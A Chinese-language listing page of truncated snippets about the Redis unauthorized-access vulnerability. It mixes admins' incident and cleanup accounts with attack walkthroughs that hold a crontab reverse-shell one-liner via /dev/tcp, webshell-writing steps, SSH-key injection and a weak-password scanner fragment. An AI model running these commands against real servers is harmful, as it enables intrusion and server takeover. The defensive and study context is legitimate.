Redis未授权检测小工具 #!/usr/bin/python3 # -*- coding: utf-8 -*- """ @Author: r0cky @Time: 2019/9/2-17:35 """ import socket import sys passwds = ['redis','root','oracle','password','p@ssw0rd','abc123!','123456','admin','abc123'] def…

在没有查到杀手之前我是先把带宽&端口用iptables 做了限制这样能保证我能远程操作服务器才能查找原因 2 在各种netstat –ntlp  的查看下没有任何异常 在top 下查到了有异常进程还有些异常的这里就截图一个 3 结果果断把进程给kill -9  了  没想到再去ps的时候又来了意思就是会自动启动它 这就让我想到了crond 这个自动任务果不其然 /var/spool/cron/root 这个文件被人做了手脚而且是二进制的声音干脆果断又给删除了,   以为这下没事了结果过了两分钟这…

总结一下redis未授权拿shell: redis-cli -h ip >info 查看系统类型 Windows: 1.找网站绝对路径 2.config set dir 绝对路径根路径 config get dir config set dbfilename indexbak.php set webshell "<?php phpinfo();?>" save Linux系统: 第一种:写密钥 第二种:写crotab反弹shell 第三种:找绝对路径写webshell…

未授权无需认证访问内部数据库. 利用计划任务反弹shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save 获取webshell config set dir /var/www/html/ config…

昨天阿里云拦截到了一次异常登陆,改了密码后就没有管他, 今天阿里云给我发消息说我的服务器可能被黑客利用,存在恶意发包行为....... 不过我不打算只是单纯的重置系统,经过一系列的查找原因后,发现被攻击的原因是我的redis没有设置登陆密码(redis 默认情况下,没有配置登陆密码,任意用户可以登录),被黑客利用然后获取到了我的root权限. 先用#ps -ef 命令看看有没有什么可疑进程 其中: START:该进程被触发启动的时间 TIME :该进程实际使用 CPU 运作的时间 COMMAND…

首先,第一个复现Redis未授权访问这个漏洞是有原因的,在 2019-07-24 的某一天,我同学的服务器突然特别卡,卡到连不上的那种,通过 top,free,netstat 等命令查看后发现,CPU占用200%,并且存在可疑进程,在很多目录下发现了可疑文件.经过排查后,确定为全盘感染的挖矿病毒,而可能的入口就是 Redis 的 6379 端口. 漏洞危害 Redis 在默认安装情况下,绑定的端口为 6379 ,没有添加过防火墙信任规则,修改默认端口等防护策略,这相当于直接将 Redis服务暴露…

Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在未授权访问以root身份运行的Redis时可将ssh公钥写入目标服务器/root/.ssh文件夹的autho…

0x00 原理   首先需要知道的是,redis是一种非关系型数据库.它在默认情况下,绑定在0.0.0.0:6379 ,若不采取相关策略,比如添加防火墙限制非信任IP访问,会使得redis服务暴露到公网,若未设置密码认证,可导致任意用户未授权访问redis以及读取redis数据. 攻击者可利用redis自身提供的config命令进行写文件,可将自己的ssh公钥写入目标服务器 /root/.ssh文件夹的authotrized_keys中,进而可用私钥直接ssh登录目标服务器. 0x01 漏洞点…

前言 redis未授权漏洞或弱口令一直是很有用的渗透突破口,最近正好闲的无事就拿redis来测试一些,做一个简单的收集,方便自己日后的回顾. 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据.攻击者在未授权访问 Red…

一.缘由: 突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑.在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中的账户都被删除,且第一行加上了REDIS0006,还有莫名其妙的账户加入,google之后确认redis漏洞被利用,服务器被攻破. 二.解决办法: 最好有一个漏扫工具,定期扫描服务器上的漏洞,并打上补丁.安全至上!! 1.查看/root/.ssh有没有authorized_keys文件,并删除之 2…